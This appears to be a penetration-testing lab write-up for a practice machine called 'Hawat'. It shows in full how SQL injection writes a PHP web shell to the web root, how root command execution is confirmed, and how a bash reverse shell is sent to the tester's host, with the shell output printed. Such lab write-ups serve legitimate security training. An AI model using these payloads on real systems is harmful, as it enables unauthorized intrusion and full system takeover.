RCE via SQL Injection
Upon validating the SQL injection vulnerability in the priority parameter of the hidden endpoint /issue/checkByPriority on the web application running on target port 17445, it has been confirmed that a file write operation is achievable. This was demonstrated by exploiting the SQL injection to write a file to a known and accessible location. The location was obtained by referencing the phpinfo.php file on the web application running on target port 30455. The exposed phpinfo.php file discloses the value of the $_SERVER['DOCUMENT_ROOT'] attribute, which provides insight into the accessible file paths for exploitation.
Issue
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ curl -X POST -s http://$IP:17445/issue/checkByPriority?priority -b 'JSESSIONID=A57CBCFA081BD958DB8F4ECB30E0C7C3' --data-urlencode "priority=' UNION SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE '/srv/http/webshell.php' -- //"
zsh: bad math expression: operand expected at `'cmd''Due to the way SHELL environment handles quotation characters and variables, I cannot just copy and paste the PHP one-liner web shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ curl -x http://localhost:8080 -X POST -s http://$IP:17445/issue/checkByPriority?priority -b 'JSESSIONID=A57CBCFA081BD958DB8F4ECB30E0C7C3' --data-urlencode "priority=' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/srv/http/webshell.php' -- //"/Practice/Hawat/3-Exploitation/attachments/{1AAF9C17-103E-4826-B53D-5B833E4E9D36}.png)
Wrapping the cmd part with the double-quotation character, ", still fails because the SHELL environment interprets the $_GET["cmd"] part as a variable
Workaround
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ curl -x http://localhost:8080 -X POST -s http://$IP:17445/issue/checkByPriority?priority -b 'JSESSIONID=1B9C4A90EC6859CD2B19F2CFC84AAFFE' --data-urlencode "priority=' UNION SELECT '<?php system(\$_GET["cmd"]); ?>' INTO OUTFILE '/srv/http/webshell.php' -- //"/Practice/Hawat/3-Exploitation/attachments/{10B1EACE-31C0-4D05-A058-0FC1D5402B9F}.png)
In order to avoid the error, the $ character must be escaped by prepending the \ character.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ curl http://$IP:30455/webshell.php?cmd=id
uid=0(root) gid=0(root) groups=0(root)Code execution confirmed
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ curl http://$IP:30455/webshell.php?cmd=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.218%2F50080%200%3E%261Sending a URL-encoded reverse shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hawat]
└─$ nnc 50080
listening on [any] 50080 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.162.147] 39886
bash: cannot set terminal process group (291): Inappropriate ioctl for device
bash: no job control in this shell
[root@hawat http]# whoami
whoami
root
[root@hawat http]# hostname
hostname
bash: hostname: command not found
[root@hawat http]# cat /etc/hostname
cat /etc/hostname
hawat
[root@hawat http]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:80:47 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.162.147/24 brd 192.168.162.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:8047/64 scope link
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the root account via RCE through SQL injection
System level compromise